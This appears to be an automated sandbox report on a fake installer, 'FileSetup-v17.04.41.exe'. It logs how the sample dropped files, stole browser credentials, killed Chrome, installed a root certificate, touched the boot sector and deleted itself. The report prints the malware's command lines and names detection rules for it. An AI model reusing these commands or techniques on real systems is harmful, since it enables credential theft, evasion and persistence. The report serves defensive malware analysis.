Source: 6852B33702F6B3BD.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1611946678493.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1611946678493.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: FileSetup-v17.04.41.exeBinary or memory string: OriginalFileName vs FileSetup-v17.04.41.exe
Source: FileSetup-v17.04.41.exe, 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmpBinary or memory string: incompatible versionbuffer errorinsufficient memorydata errorstream errorfile errorstream endneed dictionaryinvalid length/\VarFileInfo\Translation\StringFileInfo\%04X%04X\CompanyNameFileDescriptionFileVersionInternalNameLegalCopyrightOriginalFileNameProductNameProductVersionCommentsLegalTrademarksPrivateBuildSpecialBuildH vs FileSetup-v17.04.41.exe
Source: FileSetup-v17.04.41.exe, 00000001.00000000.221347616.0000000000512000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameKInstallTool.exeV vs FileSetup-v17.04.41.exe
Source: FileSetup-v17.04.41.exe, 00000001.00000002.261245694.0000000002340000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs FileSetup-v17.04.41.exe
Source: FileSetup-v17.04.41.exe, 00000001.00000002.261232452.0000000002330000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dll.muij% vs FileSetup-v17.04.41.exe
Source: FileSetup-v17.04.41.exe, 00000001.00000002.261225734.0000000002320000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dllj% vs FileSetup-v17.04.41.exe
Source: FileSetup-v17.04.41.exeBinary or memory string: incompatible versionbuffer errorinsufficient memorydata errorstream errorfile errorstream endneed dictionaryinvalid length/\VarFileInfo\Translation\StringFileInfo\%04X%04X\CompanyNameFileDescriptionFileVersionInternalNameLegalCopyrightOriginalFileNameProductNameProductVersionCommentsLegalTrademarksPrivateBuildSpecialBuildH vs FileSetup-v17.04.41.exe
Source: FileSetup-v17.04.41.exeBinary or memory string: OriginalFilenameKInstallTool.exeV vs FileSetup-v17.04.41.exe
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: FileSetup-v17.04.41.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: 00000001.00000002.261933148.00000000028E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.385937201.00000000027D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.290296269.0000000002810000.00000040.00000001.sdmp, type: MEMORYMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 5.2.6852B33702F6B3BD.exe.2810000.5.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.6852B33702F6B3BD.exe.27d0000.5.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.6852B33702F6B3BD.exe.10000000.7.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 1.2.FileSetup-v17.04.41.exe.28e0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 5.2.6852B33702F6B3BD.exe.2810000.5.raw.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.6852B33702F6B3BD.exe.27d0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 1.2.FileSetup-v17.04.41.exe.10000000.6.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 5.2.6852B33702F6B3BD.exe.10000000.7.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 1.2.FileSetup-v17.04.41.exe.28e0000.5.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.6852B33702F6B3BD.exe.32a0000.6.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 5.2.6852B33702F6B3BD.exe.34e0000.6.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: classification engineClassification label: mal90.bank.troj.spyw.evad.winEXE@32/37@4/3
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_004B84B2 GetLastError,_strncpy,FormatMessageA,__fprintf_l,_strrchr,_strrchr,GetLastError,SetLastError,1_2_004B84B2
Source: C:\Users\user\AppData\Roaming\1611946678493.exeCode function: 11_2_0040CE93 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,11_2_0040CE93
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_004140D4 __EH_prolog,CoInitializeEx,CoCreateInstance,CoSetProxyBlanket,VariantClear,CoUninitialize,1_2_004140D4
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_004023F0 __EH_prolog,LoadLibraryExW,FindResourceW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary,1_2_004023F0
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeFile created: C:\Users\user\AppData\Local\Login Data1611946677837Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6576:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5404:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6580:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3840:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello002
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello001
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign__install_r3
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeFile created: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeJump to behavior
Source: FileSetup-v17.04.41.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Roaming\1611946678493.exeSystem information queried: HandleInformationJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;chrome.exe&quot;)
Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\win.iniJump to behavior
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: FileSetup-v17.04.41.exeVirustotal: Detection: 60%
Source: FileSetup-v17.04.41.exeReversingLabs: Detection: 47%
Source: FileSetup-v17.04.41.exeString found in binary or memory: set-addPolicy
Source: FileSetup-v17.04.41.exeString found in binary or memory: id-cmc-addExtensions
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeFile read: C:\Users\user\Desktop\FileSetup-v17.04.41.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\FileSetup-v17.04.41.exe 'C:\Users\user\Desktop\FileSetup-v17.04.41.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E90BF9A81DF75408BCAEC738866B933F C
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe 0011 installp3
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe 200 installp3
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\FileSetup-v17.04.41.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Users\user\AppData\Roaming\1611946678493.exe 'C:\Users\user\AppData\Roaming\1611946678493.exe' /sjson 'C:\Users\user\AppData\Roaming\1611946678493.txt'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'Jump to behavior
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeProcess created: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe 0011 installp3Jump to behavior
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeProcess created: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe 200 installp3Jump to behavior
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\FileSetup-v17.04.41.exe'Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeProcess created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe'Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\msiexec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Install
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: FileSetup-v17.04.41.exeStatic file information: File size 4592400 > 1048576
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeFile opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dllJump to behavior
Source: FileSetup-v17.04.41.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.4.dr
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1611946678493.exe, 0000000B.00000000.271662434.000000000040F000.00000002.00020000.sdmp, 1611946678493.exe.4.dr
Source: Binary string: msvcr71.pdb\ source: msvcr71.dll.4.dr
Source: Binary string: atl71.pdbT source: atl71.dll.4.dr
Source: Binary string: atl71.pdb source: atl71.dll.4.dr
Source: Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_engine.dll.4.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: download_engine.dll.4.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.4.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.4.dr
Source: Binary string: msvcp71.pdb source: msvcp71.dll.4.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.4.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 0000001D.00000000.367402647.0000000000BFC000.00000002.00020000.sdmp, ThunderFW.exe.4.dr
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.4.dr
Source: Binary string: e:\KINGSOFT_DUBA\Build\Build_Src\kisengine\kisengine\product\win32\dbginfo\kinst_exe.pdb source: FileSetup-v17.04.41.exe
Source: Binary string: msvcr71.pdb source: msvcr71.dll.4.dr
Source: Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: gdiview.msi.1.dr

Data Obfuscation:

barindex
Detected unpacking (creates a PE file in dynamic memory)Show sources
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeUnpacked PE file: 5.2.6852B33702F6B3BD.exe.2810000.5.unpack
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_004560A0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetVersion,GetVersion,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,1_2_004560A0
Source: FileSetup-v17.04.41.exeStatic PE information: real checksum: 0x1332e9 should be: 0x469e0d
Source: MSI61C2.tmp.2.drStatic PE information: real checksum: 0x0 should be: 0x2d22
Source: 6852B33702F6B3BD.exe.1.drStatic PE information: real checksum: 0x1332e9 should be: 0x469e0d
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_00494DD9 push ebx; ret 1_2_00494DF6
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_00494DF0 push ebx; ret 1_2_00494DF6
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_00494E3E push ebx; ret 1_2_00494E3F
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_00494EA5 push ebx; ret 1_2_00494EAA
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_0049706C push ecx; ret 1_2_0049707F
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 2_2_07A5DD20 push 00000078h; ret 2_2_07A5DD22
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_10010579 push ecx; ret 4_2_1001058C
Source: C:\Users\user\AppData\Roaming\1611946678493.exeCode function: 11_2_0040E2F1 push ecx; ret 11_2_0040E301
Source: C:\Users\user\AppData\Roaming\1611946678493.exeCode function: 11_2_0040E340 push eax; ret 11_2_0040E354
Source: C:\Users\user\AppData\Roaming\1611946678493.exeCode function: 11_2_0040E340 push eax; ret 11_2_0040E37C
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 29_2_00BF3FB5 push ecx; ret 29_2_00BF3FC8

Persistence and Installation Behavior:

barindex
Contains functionality to infect the boot sectorShow sources
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d4_2_1001DA70
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d4_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d4_2_1001D7E0
Installs new ROOT certificatesShow sources
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD BlobJump to behavior
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeFile created: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeFile created: C:\Users\user\AppData\Local\Temp\download\download_engine.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeFile created: C:\Users\user\AppData\Roaming\1611946678493.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeFile created: C:\Users\user\AppData\Local\Temp\download\msvcp71.dllJump to dropped file
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeFile created: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeFile created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeFile created: C:\Users\user\AppData\Local\Temp\download\msvcr71.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeFile created: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeFile created: C:\Users\user\AppData\Local\Temp\download\zlib1.dllJump to dropped file
